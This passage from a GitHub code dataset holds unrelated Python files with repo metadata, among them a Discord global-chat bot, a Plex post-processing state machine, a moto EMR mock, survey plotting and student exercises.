4.3\\n\")\nfor lines in numbers:\n if isPrime(int(lines)) and isPrime(int(lines[::-1])):\n results.write(f\"{lines}\\n\")\n\n#4.4\nunique_numbers = []\nall_numbers = []\nfor lines in numbers:\n lines = lines.strip()\n all_numbers.append(int(lines))\n if lines not in unique_numbers:\n unique_numbers.append(lines)\n\ncounter_list = Counter(all_numbers) \ntwo_times = 0\nthree_times = 0 \nfor count in counter_list.values():\n if count == 2:\n two_times += 1\n elif count == 3:\n three_times += 1\n \nresults.write(f\"\\nZadanie 4.4\\n{len(unique_numbers)} {two_times} {three_times}\")\nprint(counter_list)\nresults.close()\n","repo_name":"zelazowska/matura_py","sub_path":"nowa_formula/2022/czerwiec22/zadanie4/liczby.py","file_name":"liczby.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"11639704220","text":"from datetime import datetime\nfrom pymongo import MongoClient\n\n\nstartTime = datetime.now()\nprint(\"Started at\", startTime)\nclient = MongoClient()\ndb = client.twitter_data\nnodes = db.nodes\ncursor_nodes = db.nodes.find()\nnetworks = db.networks\nif networks.count() > 0:\n print(\"Dropping networks\", networks.count())\n networks.drop()\n\n\ndef network_size(_id):\n node = nodes.find({\"_id\": _id}).limit(1)[0]\n if node[\"children\"] is not None:\n n_descendants = len(node[\"children\"])\n for child in node[\"children\"]:\n n_descendants += network_size(child)\n else:\n n_descendants = 0\n return n_descendants\n\ncount = 0\nfor node in cursor_nodes:\n count += 1\n if count % 1000000 == 0:\n print(str(count) + ' out of ' + str(nodes.count()) + ' done.')\n print(\"The number of networks is\", networks.count())\n print(\"Now it's\", datetime.now())\n if node[\"parent\"] is not None:\n continue\n size = network_size(node[\"_id\"])\n network = {\"_id\": node[\"_id\"],\n \"n_descendants\": size\n }\n networks.insert_one(network)\n","repo_name":"nslobodchuk/twitter-data","sub_path":"build_network.py","file_name":"build_network.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43632296550","text":"from django import template\n\nfrom notifications.models import NotificationModel\n\nregister = template.Library()\n\n\n@register.inclusion_tag('notifications/notification_bar.html')\ndef notification_bar(user, notification_url=None):\n\t\"\"\"\n\tTemplate Tag to produce a notification bar for the provided user.\n\t\"\"\"\n\tnotifications = NotificationModel.objects.filter(user=user, unread=True)\n\t\n\tcontext = {\n\t\t'notification_count': len(notifications),\n\t\t'notification_url': notification_url,\n\t}\n\treturn context\n\n","repo_name":"ortegagingrich/inventory-app","sub_path":"django_project/notifications/templatetags/notification_bar.py","file_name":"notification_bar.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"74058664515","text":"from discord.commands import slash_command\nfrom discord.ext import commands\nfrom discord.commands import Option\n\nimport aiosqlite as sqlite3\nfrom asyncio import sleep\nimport discord\nfrom datetime import datetime\nimport json\n\nclass MainCog(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n # add help embed later\n @slash_command(description=\"Wie man diesen Bot nutzen tut.\", name=\"help\")\n async def help(self, ctx):\n await ctx.respond(\"Ja.\")\n\n @slash_command(description=\"Erstelle den GlobalChat-Channel auf diesem Server\", name=\"install\")\n async def install(self, ctx, recreate: Option(str, \"Falls vorhanden, wird der alte Kanal aus der Datenbank gelöscht und ein neuer erstellt.\", choices=[\"An\"], required=False)):\n if not ctx.author.guild_permissions.manage_channels:\n embed = discord.Embed(title=\"Fehler\", color=discord.Color(0xFF431F), description=\"Du benötigst die Berechtigung, Kanäle zu verwalten.\")\n await ctx.respond(embed=embed, ephemeral=True)\n return\n async with sqlite3.connect(\"database.db\") as db:\n\n async with db.execute(\"SELECT * FROM serverdata WHERE guild = ?\", (ctx.guild.id,)) as c:\n fetch_guild = await c.fetchone()\n if recreate == \"An\":\n pass\n else:\n if fetch_guild is not None:\n embed = discord.Embed(title=\"Hinweis\", color=discord.Color(0xFF9531), description=\"Es befindet sich bereits ein Channel in der Datenbank. Bitte nutze die Option `recreate`, um den Channel neu zu erstellen und den alten aus meiner Datenbank zu entfernen.\")\n await ctx.respond(embed=embed)\n return\n \n category = ctx.channel.category\n created_channel = await ctx.guild.create_text_channel(name=\"🌍-globalchat\", category=category)\n \n # add the channel to the database\n \n await db.execute(\"INSERT OR REPLACE INTO serverdata(guild,channel) VALUES(?,?)\", (ctx.guild.id, created_channel.id))\n await db.commit()\n await ctx.respond(created_channel.mention, ephemeral=True)\n async with created_channel.typing():\n await sleep(2)\n embed = discord.Embed(color=0xB1FF1F, title=\"Willkommen\", description=f\"Ich freue mich sehr, dass **`{ctx.guild.name}`** nun dem Globalen Chat beigetreten ist.\")\n embed.set_footer(text=\"Sag 'Hallo' zu den anderen!\")\n await created_channel.send(embed=embed)\n await created_channel.edit(position=1, sync_permissions=True, slowmode_delay=3, topic=\"🌍 In diesem Channel kann mit anderen Mitgliedern über Servern hinweg geschrieben werden.\\n**REGELN:**\\n\"+\"\"\"\n \n • Kein Spam\n • Keine Beleidigungen\n • Kein NSFW\n • Keine Werbung\n\n-> Hinweis an Moderatoren: Bitte lasst den Slowmode bei mindestens 3 Sekunden, um eine Überlastung des Bots zu vermeiden.\n \n \"\"\")\n @slash_command(description=\"Bannt einen User von dem Globalen Chat\", name=\"ban\")\n async def ban(self, ctx, user: Option(discord.Member, \"Welcher Nutzer gebannt werden soll.\"), reason: Option(str, \"Der Grund für den Ban\", default=\"Kein Grund angegeben\", required=False)):\n # create a function later for fetching moderators\n with open(\"config.json\") as f:\n try:\n config: dict = json.load(f)\n mods: list = config[\"moderators\"]\n except KeyError:\n mods: list = []\n if not ctx.author.id in mods:\n embed = discord.Embed(title=\"Fehler\", color=discord.Color(0xFF431F), description=\"Du bist kein Bot-Moderator. Es ist nötig, Bot-Moderator zu sein, um Benutzer im GlobalChat zu bannen.\")\n await ctx.respond(embed=embed, ephemeral=True)\n return\n \n async with sqlite3.connect(\"database.db\") as db:\n\n async with db.execute(\"SELECT user FROM bans WHERE user = ?\", (user.id,)) as c:\n fetch_user = await c.fetchone()\n if not fetch_user:\n fetch_user = (0,)\n if user.id in fetch_user:\n embed = discord.Embed(title=\"Fehler\", color=discord.Color(0xFF431F), description=\"Dieser Nutzer ist bereits gebannt.\")\n await ctx.respond(embed=embed, ephemeral=True)\n return\n\n embed = discord.Embed(color=discord.Color(0xB1FF1F), title=\"User gebannt\", description=f\"**`Benutzer`** {user.mention}\\n**`Moderator:`** {ctx.author.mention}\\\n \\n**`Grund:`** {reason}\")\n await db.execute(\"INSERT INTO bans(user,reason,mod,time) VALUES(?,?,?,?)\", (user.id, reason, ctx.author.id, datetime.utcnow()))\n await db.commit()\n await ctx.respond(embed=embed)\ndef setup(bot):\n bot.add_cog(MainCog(bot))","repo_name":"dxtoan1992/globalchat_DB","sub_path":"cogs/main_cog.py","file_name":"main_cog.py","file_ext":"py","file_size_in_byte":4934,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20328519953","text":"#!/opt/local/bin/python3\n# encoding: utf-8\n\nimport os, shutil, subprocess, sys\n\nfrom com.camding.plexpostprocess.PlexPostProcessState import PlexPostProcessState\nfrom com.camding.plexpostprocess.Settings import Settings\nfrom com.camding.plexpostprocess.steps.AddMeta import AddMeta\nfrom com.camding.plexpostprocess.steps.Transcode import Transcode\nfrom com.camding.plexpostprocess.steps.Commskip import Commskip\nfrom com.camding.plexpostprocess.steps.DetermineFilename import DetermineFilename\n\nclass PlexPostProcessStateMachine(object):\n def __init__(self, databaseInteraction):\n self.__databaseInteraction = databaseInteraction\n self.__queue = self.GetDatabaseInteraction().GetQueue();\n\n def GetQueue(self):\n return self.__queue\n\n def GetDatabaseInteraction(self):\n return self.__databaseInteraction;\n\n def PlexPostProcess(self):\n queue = self.GetQueue()\n print('I have ' + str(len(queue)) + ' files to handle!')\n for i in range(0, len(queue)):\n queuedFile = queue[i]\n while not queuedFile.IsFinished():\n self.ProcessQueuedFile(i, queuedFile)\n\n def ProcessQueuedFile(self, i, queuedFile):\n print(' Processing ' + str(i) + queuedFile.GetFilename() + ' in state ' + queuedFile.GetState().name)\n if queuedFile.GetState() == PlexPostProcessState.INITIAL:\n if queuedFile.GetFiletype() == 'm4v':\n if Settings.GetConfig(\"Applications\", \"handbrake\", \"false\").lower in ['true', '1', 't', 'y', 'yes', 'yeah', 'yup', 'certainly', 'uh-huh', 'on' ]:\n queuedFile.SetState(PlexPostProcessState.COMMSKIP)\n else:\n queuedFile.SetState(PlexPostProcessState.TRANSCODING) # Comskip no longer needed\n self.GetDatabaseInteraction().UpdateQFState(queuedFile, \"Startup\", \"Started commskip\")\n else:\n queuedFile.SetState(PlexPostProcessState.TRANSCODING)\n self.GetDatabaseInteraction().UpdateQFState(queuedFile, \"Comskip\", \"Started processing\")\n elif queuedFile.GetState() == PlexPostProcessState.COMMSKIP:\n Commskip(self).Commskip(i, queuedFile)\n elif queuedFile.GetState() == PlexPostProcessState.TRANSCODING:\n Transcode(self).Transcode(i, queuedFile)\n elif queuedFile.GetState() == PlexPostProcessState.ADD_META:\n AddMeta(self).AddMeta(i, queuedFile)\n elif queuedFile.GetState() == PlexPostProcessState.MOVING_FILES:\n self.MoveFiles(i, queuedFile)\n elif queuedFile.GetState() == PlexPostProcessState.DELETING_ORIGINAL_FILE:\n self.DeleteOriginalFile(i, queuedFile)\n elif queuedFile.GetState() == PlexPostProcessState.PENDING_DELETE_DUPLICATE:\n self.DeleteDuplicateFile(i, queuedFile)\n else:\n raise Exception(\"Damn, invalid state \" + queuedFile.GetState().name)\n\n def RunProcess(self, command, env=None, stdin=None, stdout=None, stderr=None):\n \"\"\" Run command with specified env and I/O handles, return process \"\"\"\n\n # merge specified env with OS env\n myenv = os.environ.copy()\n if env is not None:\n myenv.update(env)\n\n try:\n process = subprocess.Popen(command, stdin=stdin, stdout=stdout, stderr=stderr, env=myenv, bufsize=0)\n return process\n except:\n print(\"Unexpected error when launching process:\")\n print(\" \", command)\n print(\" \", env)\n raise\n\n def MoveFiles(self, _i, queuedFile):\n filenameHandler = DetermineFilename(self)\n self.GetDatabaseInteraction().AddQFHistory(queuedFile, \"Move Files\", \"Moving from '\" + filenameHandler.GetTempFilename(queuedFile) + \"' to '\" + filenameHandler.GetDestFilename(queuedFile) + \"'\")\n try:\n shutil.move(filenameHandler.GetTempFilename(queuedFile), filenameHandler.GetDestFilename(queuedFile))\n except Exception as e:\n queuedFile.SetState(PlexPostProcessState.ERROR)\n print(e.__doc__)\n print(e.message)\n sys.exit(2)\n self.GetDatabaseInteraction().UpdateQFState(queuedFile, \"Move Files\", \"Error \" + str(sys.exc_info()[0]))\n return;\n if Settings.GetConfig(\"Applications\", \"handbrake\", \"false\").lower in ['true', '1', 't', 'y', 'yes', 'yeah', 'yup', 'certainly', 'uh-huh', 'on' ]:\n queuedFile.SetState(PlexPostProcessState.DELETING_ORIGINAL_FILE)\n else:\n queuedFile.SetState(PlexPostProcessState.SUCCESS)\n self.GetDatabaseInteraction().UpdateQFState(queuedFile, \"Move Files\", \"Finished moving files with success!\")\n\n def DeleteFile(self, deleteType, successState, errorState, _i, queuedFile):\n self.GetDatabaseInteraction().AddQFHistory(queuedFile, deleteType, \"Deleting '\" + queuedFile.GetFilename() + \"'\")\n try:\n os.remove(queuedFile.GetFilename())\n except:\n queuedFile.SetState(errorState)\n self.GetDatabaseInteraction().UpdateQFState(queuedFile, deleteType, \"Error \" + str(sys.exc_info()[0]))\n return;\n queuedFile.SetState(successState)\n self.GetDatabaseInteraction().UpdateQFState(queuedFile, deleteType, \"Finished deleting files with success!\")\n\n def DeleteOriginalFile(self, i, queuedFile):\n self.DeleteFile(\"Delete Original\", PlexPostProcessState.SUCCESS, PlexPostProcessState.ERROR, i, queuedFile)\n\n def DeleteDuplicateFile(self, i, queuedFile):\n self.DeleteFile(\"Delete Duplicate\", PlexPostProcessState.DUPLICATE_DELETED, PlexPostProcessState.ERROR, i, queuedFile)\n","repo_name":"dawesc/PlexPostProcess","sub_path":"com/camding/plexpostprocess/PlexPostProcessStateMachine.py","file_name":"PlexPostProcessStateMachine.py","file_ext":"py","file_size_in_byte":5224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30962087136","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy import stats\nimport seaborn as sns\n\ndef column_mean_plot(df, column, sort=False, limiter=True):\n # Plot the selected column of the dataframe\n # limiter is to set the scale for 1-5\n\n if sort:\n df = df.sort_values(by=column)\n\n # Set the color of the bars to orange\n ax = df.plot(x='img nr', y=column, kind='bar', color='#FF7F0E', width=0.6)\n\n # Set the axis labels and title\n ax.set_xlabel('Image', fontsize=12)\n ax.set_ylabel(f'{column} Score', fontsize=12)\n if limiter:\n ax.set_ylim([1, 5])\n ax.set_title(f'Mean {column} Scores by Image', fontsize=14)\n\n # Add grid lines to the plot\n plt.grid(axis='y', alpha=0.5)\n\n # Show the plot\n plt.show()\n\ndef getBestImage(df):\n # sums the mean 'realistic, creative, likeness, connection' values\n # the higher the number the better the image in all categories\n \n bestDf = df.copy()\n bestDf['sum'] = bestDf['realistic'] + bestDf['creative'] + bestDf['likeness'] + bestDf['connection']\n\n bestDf = bestDf.sort_values(by='sum')\n column_mean_plot(bestDf, 'sum', sort=True, limiter=False)\n\ndef getGeneratedImages(df):\n # the nongenerated images have the imgnr 991, 992, 993\n\n # Define the non-generated image numbers\n non_gen = [991, 992, 993]\n\n # Filter the DataFrame to include only rows with non-generated image numbers\n newDf = df[~df['img nr'].isin(non_gen)]\n \n # Return the filtered DataFrame\n return newDf\n\ndef getRealImages(df):\n # the nongenerated images have the imgnr 991, 992, 993\n\n # Define the non-generated image numbers\n non_gen = [991, 992, 993]\n\n # Filter the DataFrame \n newDf = df[df['img nr'].isin(non_gen)]\n \n # Return the filtered DataFrame\n return newDf\n\ndef mean_plot(df1, df2=None):\n # Calculate the mean of each column for the first dataframe\n mean_df1 = df1.mean().loc[['realistic', 'creative', 'likeness']]\n\n # Create a numpy array of the mean values for the first dataframe\n values1 = np.array(mean_df1.values)\n\n # Set the x-axis labels for the first dataframe\n labels1 = mean_df1.index\n\n # Create a bar chart with the mean column values for the first dataframe\n plt.bar(labels1, values1, width=0.3, label='Real')\n\n if df2 is not None:\n # Calculate the mean of each column for the second dataframe\n mean_df2 = df2.mean().loc[['realistic', 'creative', 'likeness', 'connection']]\n\n # Create a numpy array of the mean values for the second dataframe\n values2 = np.array(mean_df2.values)\n\n # Set the x-axis labels for the second dataframe\n labels2 = mean_df2.index\n\n # Create a bar chart with the mean column values for the second dataframe\n plt.bar(labels2, values2, width=0.3, label='Generated', align='edge')\n\n # Set the plot title and axis labels\n plt.title('Comparison of Mean Ratings', fontsize=14)\n # plt.xlabel('Categories', fontsize=12)\n plt.ylabel('Mean Value', fontsize=12)\n plt.ylim([1, 5])\n\n # Add a legend to the plot\n plt.legend(fontsize=12)\n\n # Add grid lines to the plot\n plt.grid(axis='y', alpha=0.5)\n\n # Show the plot\n plt.show()\n\n\n\n# Load the CSV file into a dataframe\nresponses = pd.read_csv('responses.csv')\n\n# print(responses)\n\n\n# 999 - real image\n#\n# question\timg nr\n# 1\t 46\n# 2\t 269\n# 3\t 28\n# 4\t 30\n# 5\t 154\n# 6\t 999\n# 7\t 224\n# 8\t 155\n# 9\t 17\n# 10\t 152\n# 11\t 199\n# 12\t 223\n# 13\t 999\n# 14\t 999\n# 15\t 201\n\n# Create a dictionary with column data\ndata = {'question': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15],\n 'img nr': [46, 269, 28, 30, 154, 991, 224, 155, 17, 152, 199, 223, 992, 993, 201],\n # 'aigen':[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n 'realistic':[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n 'creative':[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n 'likeness':[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n 'connection':[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n # 'comments':[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n }\n\ndf = pd.DataFrame(data)\n\n# Loop through the questions 1 to 15\nfor i in range(1,16):\n # Compute the mean value of the 'realistic' column for the current question\n realistic = responses[str(i+0.2)].mean()\n # Assign the mean value to the 'realistic' column of the corresponding row in the dataframe\n df.loc[df['question'] == i, 'realistic'] = realistic\n creative = responses[str(i+0.3)].mean()\n df.loc[df['question'] == i, 'creative'] = creative\n likeness = responses[str(i+0.4)].mean()\n df.loc[df['question'] == i, 'likeness'] = likeness\n connection = responses[str(i+0.5)].mean()\n df.loc[df['question'] == i, 'connection'] = connection\n\n\ndf = df.sort_values(by='img nr')\n\n\ndfGen = getGeneratedImages(df)\ndfReal = getRealImages(df)\n\n# print(dfGen)\n\n# mean_plot(dfReal, dfGen)\n# mean_plot(dfGen)\n\n# column_mean_plot(df, \"realistic\", sort=True)\n# column_mean_plot(df, \"creative\", sort=True)\n# column_mean_plot(df, \"likeness\", sort=True)\n# column_mean_plot(df, \"connection\", sort=True)\n# print(df)\n\ncolumn_mean_plot(dfGen, \"realistic\", sort=False)\n# column_mean_plot(dfGen, \"creative\", sort=False)\n# column_mean_plot(dfGen, \"likeness\", sort=False)\n# column_mean_plot(dfGen, \"connection\", sort=False)\n\n\n\n# getBestImage(df)\n\n\n\n\n\n\n","repo_name":"pawelsznura/Swimwear-Designer","sub_path":"survey/surveydata.py","file_name":"surveydata.py","file_ext":"py","file_size_in_byte":5467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29026373895","text":"from moto.core import BaseBackend\n\nfrom .utils import random_job_id, random_instance_group_id\n\nDEFAULT_JOB_FLOW_ROLE = 'EMRJobflowDefault'\n\n\nclass FakeInstanceGroup(object):\n def __init__(self, id, instance_count, instance_role, instance_type, market, name, bid_price=None):\n self.id = id\n self.num_instances = instance_count\n self.role = instance_role\n self.type = instance_type\n self.market = market\n self.name = name\n self.bid_price = bid_price\n\n def set_instance_count(self, instance_count):\n self.num_instances = instance_count\n\n\nclass FakeStep(object):\n def __init__(self, state, **kwargs):\n # 'Steps.member.1.HadoopJarStep.Jar': ['/home/hadoop/contrib/streaming/hadoop-streaming.jar'],\n # 'Steps.member.1.HadoopJarStep.Args.member.1': ['-mapper'],\n # 'Steps.member.1.HadoopJarStep.Args.member.2': ['s3n://elasticmapreduce/samples/wordcount/wordSplitter.py'],\n # 'Steps.member.1.HadoopJarStep.Args.member.3': ['-reducer'],\n # 'Steps.member.1.HadoopJarStep.Args.member.4': ['aggregate'],\n # 'Steps.member.1.HadoopJarStep.Args.member.5': ['-input'],\n # 'Steps.member.1.HadoopJarStep.Args.member.6': ['s3n://elasticmapreduce/samples/wordcount/input'],\n # 'Steps.member.1.HadoopJarStep.Args.member.7': ['-output'],\n # 'Steps.member.1.HadoopJarStep.Args.member.8': ['s3n:///output/wordcount_output'],\n # 'Steps.member.1.ActionOnFailure': ['TERMINATE_JOB_FLOW'],\n # 'Steps.member.1.Name': ['My wordcount example']}\n\n self.action_on_failure = kwargs['action_on_failure']\n self.name = kwargs['name']\n self.jar = kwargs['hadoop_jar_step._jar']\n self.args = []\n self.state = state\n\n arg_index = 1\n while True:\n arg = kwargs.get('hadoop_jar_step._args.member.{0}'.format(arg_index))\n if arg:\n self.args.append(arg)\n arg_index += 1\n else:\n break\n\n\nclass FakeJobFlow(object):\n def __init__(self, job_id, name, log_uri, job_flow_role, visible_to_all_users, steps, instance_attrs):\n self.id = job_id\n self.name = name\n self.log_uri = log_uri\n self.role = job_flow_role or DEFAULT_JOB_FLOW_ROLE\n self.state = \"STARTING\"\n self.steps = []\n self.add_steps(steps)\n\n self.initial_instance_count = instance_attrs.get('instance_count', 0)\n self.initial_master_instance_type = instance_attrs.get('master_instance_type')\n self.initial_slave_instance_type = instance_attrs.get('slave_instance_type')\n\n self.set_visibility(visible_to_all_users)\n self.normalized_instance_hours = 0\n self.ec2_key_name = instance_attrs.get('ec2_key_name')\n self.availability_zone = instance_attrs.get('placement.availability_zone')\n self.keep_job_flow_alive_when_no_steps = instance_attrs.get('keep_job_flow_alive_when_no_steps')\n self.termination_protected = instance_attrs.get('termination_protected')\n\n self.instance_group_ids = []\n\n def terminate(self):\n self.state = 'TERMINATED'\n\n def set_visibility(self, visibility):\n if visibility == 'true':\n self.visible_to_all_users = True\n else:\n self.visible_to_all_users = False\n\n def add_steps(self, steps):\n for index, step in enumerate(steps):\n if self.steps:\n # If we already have other steps, this one is pending\n self.steps.append(FakeStep(state='PENDING', **step))\n else:\n self.steps.append(FakeStep(state='STARTING', **step))\n\n def add_instance_group(self, instance_group_id):\n self.instance_group_ids.append(instance_group_id)\n\n @property\n def instance_groups(self):\n return emr_backend.get_instance_groups(self.instance_group_ids)\n\n @property\n def master_instance_type(self):\n groups = self.instance_groups\n if groups:\n return groups[0].type\n else:\n return self.initial_master_instance_type\n\n @property\n def slave_instance_type(self):\n groups = self.instance_groups\n if groups:\n return groups[0].type\n else:\n return self.initial_slave_instance_type\n\n @property\n def instance_count(self):\n groups = self.instance_groups\n if not groups:\n # No groups,return initial instance count\n return self.initial_instance_count\n count = 0\n for group in groups:\n count += int(group.num_instances)\n return count\n\n\nclass ElasticMapReduceBackend(BaseBackend):\n\n def __init__(self):\n self.job_flows = {}\n self.instance_groups = {}\n\n def run_job_flow(self, name, log_uri, job_flow_role, visible_to_all_users, steps, instance_attrs):\n job_id = random_job_id()\n job_flow = FakeJobFlow(job_id, name, log_uri, job_flow_role, visible_to_all_users, steps, instance_attrs)\n self.job_flows[job_id] = job_flow\n return job_flow\n\n def add_job_flow_steps(self, job_flow_id, steps):\n job_flow = self.job_flows[job_flow_id]\n job_flow.add_steps(steps)\n return job_flow\n\n def describe_job_flows(self):\n return self.job_flows.values()\n\n def terminate_job_flows(self, job_ids):\n flows = [flow for flow in self.describe_job_flows() if flow.id in job_ids]\n for flow in flows:\n flow.terminate()\n return flows\n\n def get_instance_groups(self, instance_group_ids):\n return [\n group for group_id, group\n in self.instance_groups.items()\n if group_id in instance_group_ids\n ]\n\n def add_instance_groups(self, job_flow_id, instance_groups):\n job_flow = self.job_flows[job_flow_id]\n result_groups = []\n for instance_group in instance_groups:\n instance_group_id = random_instance_group_id()\n group = FakeInstanceGroup(instance_group_id, **instance_group)\n self.instance_groups[instance_group_id] = group\n job_flow.add_instance_group(instance_group_id)\n result_groups.append(group)\n return result_groups\n\n def modify_instance_groups(self, instance_groups):\n result_groups = []\n for instance_group in instance_groups:\n group = self.instance_groups[instance_group['instance_group_id']]\n group.set_instance_count(instance_group['instance_count'])\n return result_groups\n\n def set_visible_to_all_users(self, job_ids, visible_to_all_users):\n for job_id in job_ids:\n job = self.job_flows[job_id]\n job.set_visibility(visible_to_all_users)\n\n\nemr_backend = ElasticMapReduceBackend()\n","repo_name":"luckyjd/lms_edx","sub_path":"edx-ficus.3-3/apps/edx/venvs/edxapp/lib/python2.7/site-packages/moto/emr/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6800,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"20568613086","text":"'''Er worden via het toetsenbord 10 getallen ingelezen.\nSchrijf een programma dat de positieve getallen toevoegt in een list met de naam positieve_getallen en de strikt negatieve getallen toevoegt in een list met de naam negatieve_getallen.\n\nDruk de lengte en de waarden van beide lists af.\nBepaal het kleinste getal van de list negatieve_getallen.'''\n\n\ndef main():\n positieve_getallen = []\n negatieve_getallen = []\n kleinste_getal = 1 # een positief getal is genoeg omdat de kleinste getal al negatief is\n\n for i in range(10):\n getal = int(input(\"Geef een getal in \"))\n if getal < 0:\n negatieve_getallen.append(getal)\n if getal < kleinste_getal:\n kleinste_getal = getal\n\n else:\n positieve_getallen.append(getal)\n\n print(\"{} positieve getallen in de lijst: {}\".format(len(positieve_getallen), positieve_getallen))\n print(\"{} negatieve getallen in de lijst: {}\".format(len(negatieve_getallen), negatieve_getallen))\n print(\"Het kleinste getal van de list negatieve_getallen is {}\".format(kleinste_getal))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"SemihAltintasPXL/PXLToegepast-Informatica","sub_path":"Vakken_eerste_jaar/IT-Essentials/IT-Essentials-oefeningen/7_lists/Oefeningen/oef_7.3.py","file_name":"oef_7.3.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"nl","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"20934428945","text":"from django.db import models\r\nfrom django.contrib.auth.models import User\r\n\r\n# Create your models here.\r\nclass Task(models.Model):\r\n name=models.CharField(max_length=100)\r\n created=models.DateTimeField(auto_now_add=True)\r\n updated=models.DateTimeField(auto_now=True)\r\n description=models.TextField(null=True, blank=True)\r\n complete=models.BooleanField()\r\n host=models.ForeignKey(User,on_delete=models.SET_NULL,null=True)\r\n\r\n class Meta:\r\n ordering = ['-updated','-created']\r\n\r\n def __str__(self):\r\n return self.name","repo_name":"ombharat6361/J021-M2","sub_path":"Q1/J021 M2/dailytask/question1/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41931557500","text":"# This file can check whether MPC weight matrix Q is a positive matrix or not\n#\n# Author: Yinuo Wang\n# Date: 03/19/21\n# Email: dbdxwyn@163.com\nimport numpy as np\n\nr = 4e-5\nq = np.array([1, 1, 1, 0, 0, 50, 0, 0, 1, 1, 1, 1])\nQ = np.zeros((12,12))\nR = np.zeros((12,12))\nfor i in range(12):\n Q[i][i] = q[i]\n R[i][i] = r\n# print(Q)\nfor i in range(12):\n Q_new = Q[0:(i+1),0:(i+1)]\n R_new = R[0:(i+1),0:(i+1)]\n x = np.linalg.det(Q_new)\n y = np.linalg.det(R_new)\n # print(Q_new)\n if x >= 0 and y >= 0:\n print(i,\" OK \",x,y,\"\\n\")\n else:\n print(i,\" Error \",x,y,\"\\n\")\n\n\n","repo_name":"allenwang-git/MiLAB-Cheetah-Software","sub_path":"debug_tools/positive_matrix_check.py","file_name":"positive_matrix_check.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"61"} +{"seq_id":"34365851734","text":"from dateutil.parser import parse\n\n\ndef parse_yyyymmdd(date):\n \"\"\"\n Get year, month and day from date format which MM and DD can be 00\n \"\"\"\n year, month, day = None, None, None\n try:\n _year = int(YYYYMMDD[:4])\n d = datetime(_year, 1, 1)\n year = _year\n\n _month = int(YYYYMMDD[4:6])\n d = datetime(year, _month, 1)\n month = _month\n\n _day = int(YYYYMMDD[6:])\n d = datetime(year, month, _day)\n day = _day\n\n except:\n pass\n\n return year, month, day\n\n\ndef parse_months_names(months_names):\n flexible_date = {}\n if months_names:\n months = months_names.split(\"/\")\n flexible_date[\"initial_month_name\"] = months[0]\n flexible_date[\"final_month_name\"] = (\n months[-1] if months[-1] != months[0] else None\n )\n\n return flexible_date\n\n\ndef get_year_from_textual_date(date):\n \"\"\"\n Get year from non standard textual date\n \"\"\"\n # usa parse, mas só considera o ano pois não há garantia de que\n # reconheceu corretamente mês e dia, e o ano é o que mais interessa\n non_alpha = \"\".join([c for c in date if not c.isalpha()])\n for text in (date, non_alpha):\n try:\n parsed = parse(text)\n if str(parsed.year) in date:\n # na ausencia de ano, parse retorna o ano atual\n return parsed.year\n except:\n pass\n\n\ndef parse_non_standard_date(date):\n \"\"\"\n Parse \"incomplete\" date which format is YYYYMMDD, and MM and DD can be 00,\n or textual date\n \"\"\"\n if not date:\n return {}\n flexible_date = {}\n flexible_date[\"date_text\"] = date\n\n if date.isdigit():\n year, month, day = parse_yyyymmdd(date)\n flexible_date[\"year\"] = year\n flexible_date[\"month_number\"] = month\n flexible_date[\"day\"] = day\n else:\n flexible_date[\"year\"] = get_year_from_textual_date(date)\n return flexible_date\n","repo_name":"scieloorg/scms-upload","sub_path":"core/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"2992327939","text":"\"\"\"Initial tables\n\nRevision ID: 4273ebef85cc\nRevises:\nCreate Date: 2019-11-08 16:11:30.331270\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy import Boolean, String\nfrom sqlalchemy.sql import column, table\n\n\n# revision identifiers, used by Alembic.\nrevision = '4273ebef85cc'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('notification_status',\n sa.Column('code', sa.String(length=15), nullable=False),\n sa.Column('desc', sa.String(length=100), nullable=True),\n sa.Column('default', sa.Boolean(), nullable=False),\n sa.PrimaryKeyConstraint('code')\n )\n op.create_table('notification_type',\n sa.Column('code', sa.String(length=15), nullable=False),\n sa.Column('desc', sa.String(length=100), nullable=True),\n sa.Column('default', sa.Boolean(), nullable=False),\n sa.PrimaryKeyConstraint('code'),\n sa.UniqueConstraint('code')\n )\n op.create_table('notification',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('recipients', sa.String(length=2000), nullable=False),\n 